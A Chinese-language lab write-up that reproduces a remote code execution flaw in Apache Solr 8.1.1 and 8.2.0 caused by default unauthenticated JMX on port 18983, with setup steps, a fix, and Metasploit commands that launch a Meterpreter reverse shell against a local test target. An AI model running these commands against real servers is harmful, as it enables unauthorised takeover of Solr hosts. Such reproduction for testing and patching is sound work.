Apache Solr JMX服務 RCE 漏洞復現
ps:Apache Solr8.2.0下載有點慢,需要的話評論加好友我私發你
0X00漏洞簡介
該漏洞源於默認配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置選項存在安全風險。
Apache Solr的8.1.1和8.2.0版本的自帶配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"選項。
如果使用受影響版本中的默認solr.in.sh文件,那么將啟用JMX監視並將其暴露在RMI_PORT上(默認值= 18983),
並且無需進行任何身份驗證。 如果防火牆中的入站流量打開了此端口,則具有Solr節點網絡訪問權限的任何人都將能夠訪問JMX,
並且可以上傳惡意代碼在Solr服務器上執行。該漏洞不影響Windows系統的用戶,僅影響部分版本的Linux用戶。
0X01漏洞影響范圍
Apache Solr8.1.1和8.2.0版本且不影響Windows系統用戶
0X02漏洞危害
如果受害者使用了該默認配置,則會在默認端口18983開放JMX服務,且默認未開啟認證。任何可訪問此端口的攻擊者可利用此漏洞向受影響服務發起攻擊,執行任意代碼。
0X03漏洞環境搭建
1.首先下載含有漏洞的Apache Solr版本
這里提供一個可以下載任意版本Apache Solr的網址
http://archive.apache.org/dist/lucene/solr
linux下可以通過命令wegt http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
來下載
或者可以windows下載好后通過xftp等軟件傳到linux
2.下載好后用 unzip solr-8.2.0.zip來講該文件進行解壓
解壓完成后進入該文件夾的bin目錄下
查看solr.in.sh文件發現ENABLE_REMOTE_JMX_OPTS="true"選項開啟
在bin目錄下執行命令
./solr start -force
來啟動solr服務

訪問ip加8983端口
得到該界面則環境搭建成功

0X04漏洞復現
使用尖刀端口掃描后發現18983端口開啟

我們可以用MSF中的exploit/multi/misc/java_jmx_server模塊進行漏洞復現。(因為我用kali搭建漏洞環境,使用127.0.0.1本地地址作為攻擊目標)
開啟msf執行如下命令
use exploit/multi/misc/java_jmx_server
set RHOST 127.0.0.1
set RPORT 18983
set payload java/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
執行完成,發現成功建立連接


0X05漏洞修復
將solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS選項設置為false,然后重啟Solr服務。
